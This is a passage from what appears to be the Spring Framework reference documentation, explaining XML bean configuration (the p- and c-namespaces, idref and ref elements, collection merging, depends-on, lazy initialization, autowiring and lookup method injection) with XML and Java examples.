		<!-- results in a setDriverClassName(String) call -->
		<property name="driverClassName" value="com.mysql.jdbc.Driver"/>
		<property name="url" value="jdbc:mysql://localhost:3306/mydb"/>
		<property name="username" value="root"/>
		<property name="password" value="masterkaoli"/>
	</bean>
----

The following example uses the <<beans-p-namespace,p-namespace>> for even more succinct
XML configuration.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:p="http://www.springframework.org/schema/p"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
		http://www.springframework.org/schema/beans/spring-beans.xsd">

		<bean id="myDataSource" class="org.apache.commons.dbcp.BasicDataSource"
			destroy-method="close"
			p:driverClassName="com.mysql.jdbc.Driver"
			p:url="jdbc:mysql://localhost:3306/mydb"
			p:username="root"
			p:password="masterkaoli"/>

	</beans>
----

The preceding XML is more succinct; however, typos are discovered at runtime rather than
design time, unless you use an IDE such as http://www.jetbrains.com/idea/[IntelliJ
IDEA] or the https://spring.io/tools/sts[Spring Tool Suite] (STS)
that supports automatic property completion when you create bean definitions. Such IDE
assistance is highly recommended.

You can also configure a `java.util.Properties` instance, as follows:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="mappings"
		class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer">

		<!-- typed as a java.util.Properties -->
		<property name="properties">
			<value>
				jdbc.driver.className=com.mysql.jdbc.Driver
				jdbc.url=jdbc:mysql://localhost:3306/mydb
			</value>
		</property>
	</bean>
----

The Spring container converts the text inside the `<value/>` element into a
`java.util.Properties` instance by using the JavaBeans `PropertyEditor` mechanism.
This is a nice shortcut, and is one of a few places where the Spring team does favor the
use of the nested `<value/>` element over the `value` attribute style.

[[beans-idref-element]]
===== The idref element

The `idref` element is simply an error-proof way to pass the __id__ (string value - not
a reference) of another bean in the container to a `<constructor-arg/>` or `<property/>`
element.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="theTargetBean" class="..."/>

	<bean id="client" class="...">
		<property name="targetName">
			<idref bean="theTargetBean"/>
		</property>
	</bean>
----

The above bean definition snippet is __exactly__ equivalent (at runtime) to the
following snippet:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="theTargetBean" class="..."/>

	<bean id="client" class="...">
		<property name="targetName" value="theTargetBean"/>
	</bean>
----

The first form is preferable to the second, because using the `idref` tag allows the
container to validate __at deployment time__ that the referenced, named bean actually
exists. In the second variation, no validation is performed on the value that is passed
to the `targetName` property of the `client` bean. Typos are only discovered (with most
likely fatal results) when the `client` bean is actually instantiated. If the `client`
bean is a <<beans-factory-scopes,prototype>> bean, this typo and the resulting exception
may only be discovered long after the container is deployed.

[NOTE]
====
The `local` attribute on the `idref` element is no longer supported in the 4.0 beans xsd
since it does not provide value over a regular `bean` reference anymore. Simply change
your existing `idref local` references to `idref bean` when upgrading to the 4.0 schema.
====

A common place (at least in versions earlier than Spring 2.0) where the `<idref/>` element
brings value is in the configuration of <<aop-pfb-1,AOP interceptors>> in a
`ProxyFactoryBean` bean definition. Using `<idref/>` elements when you specify the
interceptor names prevents you from misspelling an interceptor id.


[[beans-ref-element]]
==== References to other beans (collaborators)

The `ref` element is the final element inside a `<constructor-arg/>` or `<property/>`
definition element. Here you set the value of the specified property of a bean to be a
reference to another bean (a collaborator) managed by the container. The referenced bean
is a dependency of the bean whose property will be set, and it is initialized on demand
as needed before the property is set. (If the collaborator is a singleton bean, it may
be initialized already by the container.) All references are ultimately a reference to
another object. Scoping and validation depend on whether you specify the id/name of the
other object through the `bean`, `local`, or `parent` attributes.

Specifying the target bean through the `bean` attribute of the `<ref/>` tag is the most
general form, and allows creation of a reference to any bean in the same container or
parent container, regardless of whether it is in the same XML file.
The value of the
`bean` attribute may be the same as the `id` attribute of the target bean, or the same
as one of the values in the `name` attribute of the target bean.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<ref bean="someBean"/>
----

Specifying the target bean through the `parent` attribute creates a reference to a bean
that is in a parent container of the current container. The value of the `parent`
attribute may be the same as either the `id` attribute of the target bean, or one of the
values in the `name` attribute of the target bean, and the target bean must be in a
parent container of the current one. You use this bean reference variant mainly when you
have a hierarchy of containers and you want to wrap an existing bean in a parent
container with a proxy that will have the same name as the parent bean.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- in the parent context -->
	<bean id="accountService" class="com.foo.SimpleAccountService">
		<!-- insert dependencies as required as here -->
	</bean>
----

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- in the child (descendant) context -->
	<!-- the bean name is the same as the parent bean's name -->
	<bean id="accountService"
		class="org.springframework.aop.framework.ProxyFactoryBean">
		<property name="target">
			<ref parent="accountService"/> <!-- notice how we refer to the parent bean -->
		</property>
		<!-- insert other configuration and dependencies as required here -->
	</bean>
----

[NOTE]
====
The `local` attribute on the `ref` element is no longer supported in the 4.0 beans xsd
since it does not provide value over a regular `bean` reference anymore. Simply change
your existing `ref local` references to `ref bean` when upgrading to the 4.0 schema.
====


[[beans-inner-beans]]
==== Inner beans

A `<bean/>` element inside the `<property/>` or `<constructor-arg/>` elements defines a
so-called __inner bean__.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="outer" class="...">
		<!-- instead of using a reference to a target bean, simply define the target bean inline -->
		<property name="target">
			<bean class="com.example.Person"> <!-- this is the inner bean -->
				<property name="name" value="Fiona Apple"/>
				<property name="age" value="25"/>
			</bean>
		</property>
	</bean>
----

An inner bean definition does not require a defined id or name; if specified, the container
does not use such a value as an identifier. The container also ignores the `scope` flag on
creation: Inner beans are __always__ anonymous and they are __always__ created with the outer
bean. It is __not__ possible to inject inner beans into collaborating beans other than into
the enclosing bean or to access them independently.

As a corner case, it is possible to receive destruction callbacks from a custom scope, e.g.
for a request-scoped inner bean contained within a singleton bean: The creation of the inner
bean instance will be tied to its containing bean, but destruction callbacks allow it to
participate in the request scope's lifecycle.
This is not a common scenario; inner beans
typically simply share their containing bean's scope.


[[beans-collection-elements]]
==== Collections

In the `<list/>`, `<set/>`, `<map/>`, and `<props/>` elements, you set the properties
and arguments of the Java `Collection` types `List`, `Set`, `Map`, and `Properties`,
respectively.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="moreComplexObject" class="example.ComplexObject">
		<!-- results in a setAdminEmails(java.util.Properties) call -->
		<property name="adminEmails">
			<props>
				<prop key="administrator">administrator@example.org</prop>
				<prop key="support">support@example.org</prop>
				<prop key="development">development@example.org</prop>
			</props>
		</property>
		<!-- results in a setSomeList(java.util.List) call -->
		<property name="someList">
			<list>
				<value>a list element followed by a reference</value>
				<ref bean="myDataSource"/>
			</list>
		</property>
		<!-- results in a setSomeMap(java.util.Map) call -->
		<property name="someMap">
			<map>
				<entry key="an entry" value="just some string"/>
				<entry key="a ref" value-ref="myDataSource"/>
			</map>
		</property>
		<!-- results in a setSomeSet(java.util.Set) call -->
		<property name="someSet">
			<set>
				<value>just some string</value>
				<ref bean="myDataSource"/>
			</set>
		</property>
	</bean>
----

__The value of a map key or value, or a set value, can also be any of the
following elements:__

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	bean | ref | idref | list | set | map | props | value | null
----

[[beans-collection-elements-merging]]
===== Collection merging

The Spring container also supports the __merging__ of collections. An application
developer can define a parent-style `<list/>`, `<map/>`, `<set/>` or `<props/>` element,
and have child-style `<list/>`, `<map/>`, `<set/>` or `<props/>` elements inherit and
override values from the parent collection. That is, the child collection's values are
the result of merging the elements of the parent and child collections, with the child's
collection elements overriding values specified in the parent collection.

__This section on merging discusses the parent-child bean mechanism.
Readers unfamiliar
with parent and child bean definitions may wish to read the
<<beans-child-bean-definitions,relevant section>> before continuing.__

The following example demonstrates collection merging:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans>
		<bean id="parent" abstract="true" class="example.ComplexObject">
			<property name="adminEmails">
				<props>
					<prop key="administrator">administrator@example.com</prop>
					<prop key="support">support@example.com</prop>
				</props>
			</property>
		</bean>
		<bean id="child" parent="parent">
			<property name="adminEmails">
				<!-- the merge is specified on the child collection definition -->
				<props merge="true">
					<prop key="sales">sales@example.com</prop>
					<prop key="support">support@example.co.uk</prop>
				</props>
			</property>
		</bean>
	</beans>
----

Notice the use of the `merge="true"` attribute on the `<props/>` element of the
`adminEmails` property of the `child` bean definition. When the `child` bean is resolved
and instantiated by the container, the resulting instance has an `adminEmails`
`Properties` collection that contains the result of the merging of the child's
`adminEmails` collection with the parent's `adminEmails` collection.

[literal]
[subs="verbatim,quotes"]
----
administrator=administrator@example.com
sales=sales@example.com
support=support@example.co.uk
----

The child `Properties` collection's value set inherits all property elements from the
parent `<props/>`, and the child's `support` value overrides the value in the parent
collection.

This merging behavior applies similarly to the `<list/>`, `<map/>`, and `<set/>`
collection types. In the specific case of the `<list/>` element, the semantics
associated with the `List` collection type, that is, the notion of an `ordered`
collection of values, are maintained; the parent's values precede all of the child list's
values. In the case of the `Map`, `Set`, and `Properties` collection types, no ordering
exists. Hence no ordering semantics are in effect for the collection types that underlie
the associated `Map`, `Set`, and `Properties` implementation types that the container
uses internally.

[[beans-collection-merge-limitations]]
===== Limitations of collection merging

You cannot merge different collection types (such as a `Map` and a `List`), and if you
do attempt to do so, an appropriate `Exception` is thrown. The `merge` attribute must be
specified on the lower, inherited child definition; specifying the `merge` attribute on
a parent collection definition is redundant and will not result in the desired merging.

[[beans-collection-elements-strongly-typed]]
===== Strongly-typed collection

With the introduction of generic types in Java 5, you can use strongly typed collections.
That is, it is possible to declare a `Collection` type such that it can only contain
`String` elements (for example).
If you are using Spring to dependency-inject a\nstrongly-typed `Collection` into a bean, you can take advantage of Spring's\ntype-conversion support such that the elements of your strongly-typed `Collection`\ninstances are converted to the appropriate type prior to being added to the `Collection`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Foo {\n\n\t\tprivate Map<String, Float> accounts;\n\n\t\tpublic void setAccounts(Map<String, Float> accounts) {\n\t\t\tthis.accounts = accounts;\n\t\t}\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<property name=\"accounts\">\n\t\t\t\t<map>\n\t\t\t\t\t<entry key=\"one\" value=\"9.99\"\/>\n\t\t\t\t\t<entry key=\"two\" value=\"2.75\"\/>\n\t\t\t\t\t<entry key=\"six\" value=\"3.99\"\/>\n\t\t\t\t<\/map>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nWhen the `accounts` property of the `foo` bean is prepared for injection, the generics\ninformation about the element type of the strongly-typed `Map<String, Float>` is\navailable by reflection. Thus Spring's type conversion infrastructure recognizes the\nvarious value elements as being of type `Float`, and the string values `9.99, 2.75`, and\n`3.99` are converted into an actual `Float` type.\n\n\n[[beans-null-element]]\n==== Null and empty string values\n\nSpring treats empty arguments for properties and the like as empty `Strings`. The\nfollowing XML-based configuration metadata snippet sets the email property to the empty\n`String` value (\"\").\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"ExampleBean\">\n\t\t<property name=\"email\" value=\"\"\/>\n\t<\/bean>\n----\n\nThe preceding example is equivalent to the following Java code:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n exampleBean.setEmail(\"\")\n----\n\nThe `<null\/>` element handles `null` values. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"ExampleBean\">\n\t\t<property name=\"email\">\n\t\t\t<null\/>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe above configuration is equivalent to the following Java code:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\texampleBean.setEmail(null)\n----\n\n\n[[beans-p-namespace]]\n==== XML shortcut with the p-namespace\n\nThe p-namespace enables you to use the `bean` element's attributes, instead of nested\n`<property\/>` elements, to describe your property values and\/or collaborating beans.\n\nSpring supports extensible configuration formats <<xsd-configuration,with namespaces>>, which are\nbased on an XML Schema definition. The `beans` configuration format discussed in this\nchapter is defined in an XML Schema document. 
However, the p-namespace is not defined in
an XSD file and exists only in the core of Spring.

The following example shows two XML snippets that resolve to the same result: The first
uses standard XML format and the second uses the p-namespace.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:p="http://www.springframework.org/schema/p"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
			http://www.springframework.org/schema/beans/spring-beans.xsd">

		<bean name="classic" class="com.example.ExampleBean">
			<property name="email" value="foo@bar.com"/>
		</bean>

		<bean name="p-namespace" class="com.example.ExampleBean"
			p:email="foo@bar.com"/>
	</beans>
----

The example shows an attribute in the p-namespace called `email` in the bean definition.
This tells Spring to include a property declaration. As previously mentioned, the
p-namespace does not have a schema definition, so you can set the name of the attribute
to the property name.

This next example includes two more bean definitions that both have a reference to
another bean:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:p="http://www.springframework.org/schema/p"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
			http://www.springframework.org/schema/beans/spring-beans.xsd">

		<bean name="john-classic" class="com.example.Person">
			<property name="name" value="John Doe"/>
			<property name="spouse" ref="jane"/>
		</bean>

		<bean name="john-modern"
			class="com.example.Person"
			p:name="John Doe"
			p:spouse-ref="jane"/>

		<bean name="jane" class="com.example.Person">
			<property name="name" value="Jane Doe"/>
		</bean>
	</beans>
----

As you can see, this example includes not only a property value using the p-namespace,
but also uses a special format to declare property references. Whereas the first bean
definition uses `<property name="spouse" ref="jane"/>` to create a reference from bean
`john-classic` to bean `jane`, the second bean definition uses `p:spouse-ref="jane"` as an
attribute to do the exact same thing. In this case `spouse` is the property name,
whereas the `-ref` part indicates that this is not a straight value but rather a
reference to another bean.

[NOTE]
====
The p-namespace is not as flexible as the standard XML format. For example, the format
for declaring property references clashes with properties that end in `Ref`, whereas the
standard XML format does not. 
We recommend that you choose your approach carefully and
communicate this to your team members, to avoid producing XML documents that use all
three approaches at the same time.
====


[[beans-c-namespace]]
==== XML shortcut with the c-namespace

Similar to the <<beans-p-namespace>>, the __c-namespace__, newly introduced in Spring
3.1, allows usage of inlined attributes for configuring the constructor arguments rather
than nested `constructor-arg` elements.

Let's review the examples from <<beans-constructor-injection>> with the `c:` namespace:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:c="http://www.springframework.org/schema/c"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
			http://www.springframework.org/schema/beans/spring-beans.xsd">

		<bean id="bar" class="x.y.Bar"/>
		<bean id="baz" class="x.y.Baz"/>

		<!-- traditional declaration -->
		<bean id="foo" class="x.y.Foo">
			<constructor-arg ref="bar"/>
			<constructor-arg ref="baz"/>
			<constructor-arg value="foo@bar.com"/>
		</bean>

		<!-- c-namespace declaration -->
		<bean id="foo" class="x.y.Foo" c:bar-ref="bar" c:baz-ref="baz" c:email="foo@bar.com"/>

	</beans>
----

The `c:` namespace uses the same conventions as the `p:` one (trailing `-ref` for bean
references) for setting the constructor arguments by their names. Like the `p:`
namespace, it must be declared even though it is not defined in an XSD schema (but it
exists inside the Spring core).

For the rare cases where the constructor argument names are not available (usually if
the bytecode was compiled without debugging information), you can fall back to the
argument indexes:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- c-namespace index declaration -->
	<bean id="foo" class="x.y.Foo" c:_0-ref="bar" c:_1-ref="baz"/>
----

[NOTE]
====
Due to the XML grammar, the index notation requires the presence of the leading `_` as
XML attribute names cannot start with a number (even though some IDEs allow it).
====

In practice, the constructor resolution
<<beans-factory-ctor-arguments-resolution,mechanism>> is quite effective at matching
arguments, so unless you really need to, we recommend using the name notation
throughout your configuration.


[[beans-compound-property-names]]
==== Compound property names

You can use compound or nested property names when you set bean properties, as long as
all components of the path except the final property name are not `null`. Consider the
following bean definition.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="foo" class="foo.Bar">
		<property name="fred.bob.sammy" value="123" />
	</bean>
----

The `foo` bean has a `fred` property, which has a `bob` property, which has a `sammy`
property, and that final `sammy` property is being set to the value `123`. In order for
this to work, the `fred` property of `foo` and the `bob` property of `fred` must not be
`null` after the bean is constructed, or a `NullPointerException` is thrown.



[[beans-factory-dependson]]
=== Using depends-on

If a bean is a dependency of another bean, that usually means that one bean is set as a
property of another. 
Typically you accomplish this with the <<beans-ref-element, `<ref/>`
element>> in XML-based configuration metadata. However, sometimes dependencies between
beans are less direct; for example, a static initializer in a class needs to be
triggered, such as database driver registration. The `depends-on` attribute can
explicitly force one or more beans to be initialized before the bean using this element
is initialized. The following example uses the `depends-on` attribute to express a
dependency on a single bean:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="beanOne" class="ExampleBean" depends-on="manager"/>
	<bean id="manager" class="ManagerBean" />
----

To express a dependency on multiple beans, supply a list of bean names as the value of
the `depends-on` attribute, with commas, whitespace, or semicolons as valid
delimiters:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="beanOne" class="ExampleBean" depends-on="manager,accountDao">
		<property name="manager" ref="manager" />
	</bean>

	<bean id="manager" class="ManagerBean" />
	<bean id="accountDao" class="x.y.jdbc.JdbcAccountDao" />
----

[NOTE]
====
The `depends-on` attribute in the bean definition can specify both an initialization
time dependency and, in the case of <<beans-factory-scopes-singleton,singleton>> beans
only, a corresponding destroy time dependency. Dependent beans that define a
`depends-on` relationship with a given bean are destroyed first, prior to the given bean
itself being destroyed. Thus `depends-on` can also control shutdown order.
====



[[beans-factory-lazy-init]]
=== Lazy-initialized beans

By default, `ApplicationContext` implementations eagerly create and configure all
<<beans-factory-scopes-singleton,singleton>> beans as part of the initialization
process. Generally, this pre-instantiation is desirable, because errors in the
configuration or surrounding environment are discovered immediately, as opposed to hours
or even days later. When this behavior is __not__ desirable, you can prevent
pre-instantiation of a singleton bean by marking the bean definition as
lazy-initialized. A lazy-initialized bean tells the IoC container to create a bean
instance when it is first requested, rather than at startup.

In XML, this behavior is controlled by the `lazy-init` attribute on the `<bean/>`
element; for example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="lazy" class="com.foo.ExpensiveToCreateBean" lazy-init="true"/>
	<bean name="not.lazy" class="com.foo.AnotherBean"/>
----

When the preceding configuration is consumed by an `ApplicationContext`, the bean named
`lazy` is not eagerly pre-instantiated when the `ApplicationContext` is starting up,
whereas the `not.lazy` bean is eagerly pre-instantiated.

However, when a lazy-initialized bean is a dependency of a singleton bean that is
__not__ lazy-initialized, the `ApplicationContext` creates the lazy-initialized bean at
startup, because it must satisfy the singleton's dependencies. In effect, the
lazy-initialized bean is created eagerly because it is injected into a singleton bean
elsewhere that is not lazy-initialized.

You can also control lazy-initialization at the container level by using the
`default-lazy-init` attribute on the `<beans/>` element; for example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans default-lazy-init="true">
		<!-- no beans will be pre-instantiated... -->
	</beans>
----


[[beans-factory-autowire]]
=== Autowiring collaborators

The Spring container can __autowire__ relationships between collaborating beans. You can
allow Spring to resolve collaborators (other beans) automatically for your bean by
inspecting the contents of the `ApplicationContext`. Autowiring has the following
advantages:

* Autowiring can significantly reduce the need to specify properties or constructor
 arguments. (Other mechanisms such as a bean template
 <<beans-child-bean-definitions,discussed elsewhere in this chapter>> are also valuable
 in this regard.)
* Autowiring can update a configuration as your objects evolve. For example, if you need
 to add a dependency to a class, that dependency can be satisfied automatically without
 you needing to modify the configuration. Thus autowiring can be especially useful
 during development, without negating the option of switching to explicit wiring when
 the code base becomes more stable.

When using XML-based configuration metadata footnote:[See
pass:specialcharacters,macros[<<beans-factory-collaborators>>]], you specify autowire
mode for a bean definition with the `autowire` attribute of the `<bean/>` element. The
autowiring functionality has four modes. You specify autowiring __per__ bean and thus
can choose which ones to autowire.

[[beans-factory-autowiring-modes-tbl]]
.Autowiring modes
|===
| Mode| Explanation

| no
| (Default) No autowiring. Bean references must be defined via a `ref` element. Changing
 the default setting is not recommended for larger deployments, because specifying
 collaborators explicitly gives greater control and clarity. To some extent, it
 documents the structure of a system.

| byName
| Autowiring by property name. Spring looks for a bean with the same name as the
 property that needs to be autowired. For example, if a bean definition is set to
 autowire by name, and it contains a __master__ property (that is, it has a
 __setMaster(..)__ method), Spring looks for a bean definition named `master`, and uses
 it to set the property.

| byType
| Allows a property to be autowired if exactly one bean of the property type exists in
 the container. If more than one exists, a fatal exception is thrown, which indicates
 that you may not use __byType__ autowiring for that bean. If there are no matching
 beans, nothing happens; the property is not set.

| constructor
| Analogous to __byType__, but applies to constructor arguments. If there is not exactly
 one bean of the constructor argument type in the container, a fatal error is raised.
|===

With __byType__ or __constructor__ autowiring mode, you can wire arrays and
typed collections. In such cases __all__ autowire candidates within the container that
match the expected type are provided to satisfy the dependency. You can autowire
strongly-typed `Map` instances if the expected key type is `String`. An autowired
`Map`'s values consist of all bean instances that match the expected type, and the
`Map`'s keys contain the corresponding bean names.

You can combine autowire behavior with dependency checking, which is performed after
autowiring completes.
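
As a brief illustration of the `autowire` attribute, the following sketch (the bean
names and classes here are illustrative assumptions, not taken from the text above)
lets the container resolve a single collaborator by type rather than through an
explicit `<property/>` entry:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- the one and only bean of type AccountDao in the container -->
	<bean id="accountDao" class="x.y.JdbcAccountDao"/>

	<!-- setAccountDao(..) is called with the accountDao bean; no <property/> needed -->
	<bean id="accountService" class="x.y.AccountService" autowire="byType"/>
----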

[[beans-autowired-exceptions]]
==== Limitations and disadvantages of autowiring

Autowiring works best when it is used consistently across a project. If autowiring is
not used in general, it might be confusing to developers to use it to wire only one or
two bean definitions.

Consider the limitations and disadvantages of autowiring:

* Explicit dependencies in `property` and `constructor-arg` settings always override
 autowiring. You cannot autowire so-called __simple__ properties such as primitives,
 `Strings`, and `Classes` (and arrays of such simple properties). This limitation is
 by design.
* Autowiring is less exact than explicit wiring. Although, as noted in the above table,
 Spring is careful to avoid guessing in case of ambiguity that might have unexpected
 results, the relationships between your Spring-managed objects are no longer
 documented explicitly.
* Wiring information may not be available to tools that may generate documentation from
 a Spring container.
* Multiple bean definitions within the container may match the type specified by the
 setter method or constructor argument to be autowired. For arrays, collections, or
 Maps, this is not necessarily a problem. However, for dependencies that expect a single
 value, this ambiguity is not arbitrarily resolved. If no unique bean definition is
 available, an exception is thrown.

In the latter scenario, you have several options:

* Abandon autowiring in favor of explicit wiring.
* Avoid autowiring for a bean definition by setting its `autowire-candidate` attribute
 to `false` as described in the next section.
* Designate a single bean definition as the __primary__ candidate by setting the
 `primary` attribute of its `<bean/>` element to `true`.
* Implement the more fine-grained control available
 with annotation-based configuration, as described in <<beans-annotation-config>>.


[[beans-factory-autowire-candidate]]
==== Excluding a bean from autowiring

On a per-bean basis, you can exclude a bean from autowiring. In Spring's XML format, set
the `autowire-candidate` attribute of the `<bean/>` element to `false`; the container
makes that specific bean definition unavailable to the autowiring infrastructure
(including annotation style configurations such as <<beans-autowired-annotation,
`@Autowired`>>).

You can also limit autowire candidates based on pattern-matching against bean names. The
top-level `<beans/>` element accepts one or more patterns within its
`default-autowire-candidates` attribute. For example, to limit autowire candidate status
to any bean whose name ends with __Repository__, provide a value of `*Repository`. To
provide multiple patterns, define them in a comma-separated list. An explicit value of
`true` or `false` for a bean definition's `autowire-candidate` attribute always takes
precedence, and for such beans, the pattern matching rules do not apply.

These techniques are useful for beans that you never want to be injected into other
beans by autowiring. It does not mean that an excluded bean cannot itself be configured
using autowiring. Rather, the bean itself is not a candidate for autowiring into other
beans.
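
For example, a minimal sketch combining the `primary` and `autowire-candidate`
attributes described above (the bean names and classes are illustrative assumptions):

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- preferred candidate when several beans of the same type match -->
	<bean id="mainDataSource" class="x.y.SimpleDataSource" primary="true"/>

	<!-- never offered as a candidate when other beans are autowired -->
	<bean id="reportingDataSource" class="x.y.SimpleDataSource" autowire-candidate="false"/>
----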


[[beans-factory-method-injection]]
=== Method injection

In most application scenarios, most beans in the container are
<<beans-factory-scopes-singleton,singletons>>. When a singleton bean needs to
collaborate with another singleton bean, or a non-singleton bean needs to collaborate
with another non-singleton bean, you typically handle the dependency by defining one
bean as a property of the other. A problem arises when the bean lifecycles are
different. Suppose singleton bean A needs to use non-singleton (prototype) bean B,
perhaps on each method invocation on A. The container only creates the singleton bean A
once, and thus only gets one opportunity to set the properties. The container cannot
provide bean A with a new instance of bean B every time one is needed.

A solution is to forego some inversion of control. You can <<beans-factory-aware,make
bean A aware of the container>> by implementing the `ApplicationContextAware` interface,
and by <<beans-factory-client,making a `getBean("B")` call to the container>> to ask for (a
typically new) bean B instance every time bean A needs it. The following is an example
of this approach:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	// a class that uses a stateful Command-style class to perform some processing
	package fiona.apple;

	// Spring-API imports
	import org.springframework.beans.BeansException;
	import org.springframework.context.ApplicationContext;
	import org.springframework.context.ApplicationContextAware;

	public class CommandManager implements ApplicationContextAware {

		private ApplicationContext applicationContext;

		public Object process(Map commandState) {
			// grab a new instance of the appropriate Command
			Command command = createCommand();
			// set the state on the (hopefully brand new) Command instance
			command.setState(commandState);
			return command.execute();
		}

		protected Command createCommand() {
			// notice the Spring API dependency!
			return this.applicationContext.getBean("command", Command.class);
		}

		public void setApplicationContext(
				ApplicationContext applicationContext) throws BeansException {
			this.applicationContext = applicationContext;
		}
	}
----

The preceding is not desirable, because the business code is aware of and coupled to the
Spring Framework. Method Injection, a somewhat advanced feature of the Spring IoC
container, allows this use case to be handled in a clean fashion.

****
You can read more about the motivation for Method Injection in
https://spring.io/blog/2004/08/06/method-injection/[this blog entry].
****


[[beans-factory-lookup-method-injection]]
==== Lookup method injection

Lookup method injection is the ability of the container to override methods on
__container managed beans__, to return the lookup result for another named bean in the
container. The lookup typically involves a prototype bean as in the scenario described
in the preceding section. 
The Spring Framework implements this method injection by using
bytecode generation from the CGLIB library to dynamically generate a subclass that
overrides the method.

[NOTE]
====
* For this dynamic subclassing to work, the class that the Spring bean container will
 subclass cannot be `final`, and the method to be overridden cannot be `final` either.
* Unit-testing a class that has an `abstract` method requires you to subclass the class
 yourself and to supply a stub implementation of the `abstract` method.
* Concrete methods are also necessary for component scanning, which requires concrete
 classes to pick up.
* A further key limitation is that lookup methods won't work with factory methods and
 in particular not with `@Bean` methods in configuration classes, since the container
 is not in charge of creating the instance in that case and therefore cannot create
 a runtime-generated subclass on the fly.
====

Looking at the `CommandManager` class in the previous code snippet, you see that the
Spring container will dynamically override the implementation of the `createCommand()`
method. Your `CommandManager` class will not have any Spring dependencies, as can be
seen in the reworked example:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package fiona.apple;

	// no more Spring imports!

	public abstract class CommandManager {

		public Object process(Object commandState) {
			// grab a new instance of the appropriate Command interface
			Command command = createCommand();
			// set the state on the (hopefully brand new) Command instance
			command.setState(commandState);
			return command.execute();
		}

		// okay... but where is the implementation of this method?
		protected abstract Command createCommand();
	}
----

In the client class containing the method to be injected (the `CommandManager` in this
case), the method to be injected requires a signature of the following form:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	<public|protected> [abstract] <return-type> theMethodName(no-arguments);
----

If the method is `abstract`, the dynamically-generated subclass implements the method.
Otherwise, the dynamically-generated subclass overrides the concrete method defined in
the original class. For example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- a stateful bean deployed as a prototype (non-singleton) -->
	<bean id="myCommand" class="fiona.apple.AsyncCommand" scope="prototype">
		<!-- inject dependencies here as required -->
	</bean>

	<!-- commandManager uses myCommand -->
	<bean id="commandManager" class="fiona.apple.CommandManager">
		<lookup-method name="createCommand" bean="myCommand"/>
	</bean>
----

The bean identified as __commandManager__ calls its own method `createCommand()`
whenever it needs a new instance of the __myCommand__ bean. You must be careful to deploy
the `myCommand` bean as a prototype, if that is actually what is needed. 
If it is
deployed as a <<beans-factory-scopes-singleton,singleton>>, the same instance of the `myCommand`
bean is returned each time.

Alternatively, within the annotation-based component model, you may declare a lookup
method through the `@Lookup` annotation:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public abstract class CommandManager {

		public Object process(Object commandState) {
			Command command = createCommand();
			command.setState(commandState);
			return command.execute();
		}

		@Lookup("myCommand")
		protected abstract Command createCommand();
	}
----

Or, more idiomatically, you may rely on the target bean getting resolved against the
declared return type of the lookup method:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public abstract class CommandManager {

		public Object process(Object commandState) {
			MyCommand command = createCommand();
			command.setState(commandState);
			return command.execute();
		}

		@Lookup
		protected abstract MyCommand createCommand();
	}
----

Note that you will typically declare such annotated lookup methods with a concrete
stub implementation, in order for them to be compatible with Spring's component
scanning rules where abstract classes get ignored by default. This limitation does not
apply in the case of explicitly registered or explicitly imported bean classes.

[TIP]
====
Another way of accessing differently scoped target beans is an `ObjectFactory`/
`Provider` injection point. Check out <<beans-factory-scopes-other-injection>>.

The interested reader may also find the `ServiceLocatorFactoryBean` (in the
`org.springframework.beans.factory.config` package) to be of use.
====


[[beans-factory-arbitrary-method-replacement]]
==== Arbitrary method replacement

A less useful form of method injection than lookup method injection is the ability to
replace arbitrary methods in a managed bean with another method implementation. Users
